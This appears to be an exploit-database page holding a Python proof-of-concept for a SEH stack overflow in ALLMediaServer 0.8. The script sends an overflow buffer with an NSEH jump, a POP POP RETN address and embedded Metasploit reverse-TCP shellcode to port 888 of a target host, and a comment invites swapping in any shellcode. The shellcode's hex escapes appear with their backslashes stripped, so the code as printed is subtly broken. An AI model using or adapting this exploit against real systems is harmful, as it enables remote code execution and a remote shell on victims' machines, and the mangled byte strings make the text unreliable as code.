[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : ALLMediaServer 0.8 SEH Overflow Exploit
# Published : 2012-07-06
# Author :
# Previous Title : Ezhometech Ezserver 6.4 Stack Overflow Exploit
# Next Title : MS12-037 Internet Explorer Same ID Property Deleted Object Handling Memory Corruption
# Exploit Title: seh exploit, BOF
# Date: 04/07/2012
# Exploit Author: motaz reda
# my E-mail: motazkhodair@gmail.com
# Software Link: http://allmediaserver.org/
# Version: ALLMediaServer 0.8
# Tested On: Windows 7 ultimate
################################################
#!/usr/bin/python
import sys, socket
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((sys.argv[1], 888))
buffer = "A" * 1072
buffer += "xebx06x90x90" #NSEH jmp short 6
buffer += "xcax24xecx65" # SEH POP POP RETN
# msfpayload windows/shell_reverse_tcp
# you can replace the shellcode with any shellcode u want
buffer += ("xd9xc8xd9x74x24xf4xb8xa6xaaxb6xadx5bx2bxc9xb1"
"x4fx83xebxfcx31x43x15x03x43x15x44x5fx4ax45x01"
"xa0xb3x96x71x28x56xa7xa3x4ex12x9ax73x04x76x17"
"xf8x48x63xacx8cx44x84x05x3axb3xabx96x8bx7bx67"
"x54x8ax07x7ax89x6cx39xb5xdcx6dx7exa8x2fx3fxd7"
"xa6x82xafx5cxfax1excexb2x70x1exa8xb7x47xebx02"
"xb9x97x44x19xf1x0fxeex45x22x31x23x96x1ex78x48"
"x6cxd4x7bx98xbdx15x4axe4x11x28x62xe9x68x6cx45"
"x12x1fx86xb5xafx27x5dxc7x6bxa2x40x6fxffx14xa1"
"x91x2cxc2x22x9dx99x81x6dx82x1cx46x06xbex95x69"
"xc9x36xedx4dxcdx13xb5xecx54xfex18x11x86xa6xc5"
"xb7xccx45x11xc1x8ex01xd6xffx30xd2x70x88x43xe0"
"xdfx22xccx48x97xecx0bxaex82x48x83x51x2dxa8x8d"
"x95x79xf8xa5x3cx02x93x35xc0xd7x33x66x6ex88xf3"
"xd6xcex78x9bx3cxc1xa7xbbx3ex0bxdexfcxa9x74x49"
"x03x3ex1dx88x03x2fx81x05xe5x25x29x40xbexd1xd0"
"xc9x34x43x1cxc4xdcxe0x8fx83x1cx6exacx1bx4bx27"
"x02x52x19xd5x3dxccx3fx24xdbx37xfbxf3x18xb9x02"
"x71x24x9dx14x4fxa5x99x40x1fxf0x77x3exd9xaax39"
"xe8xb3x01x90x7cx45x6ax23xfax4axa7xd5xe2xfbx1e"
"xa0x1dx33xf7x24x66x29x67xcaxbdxe9x97x81x9fx58"
"x30x4cx4axd9x5dx6fxa1x1ex58xecx43xdfx9fxecx26"
"xdaxe4xaaxdbx96x75x5fxdbx05x75x4a")
s.send(buffer)
s.close()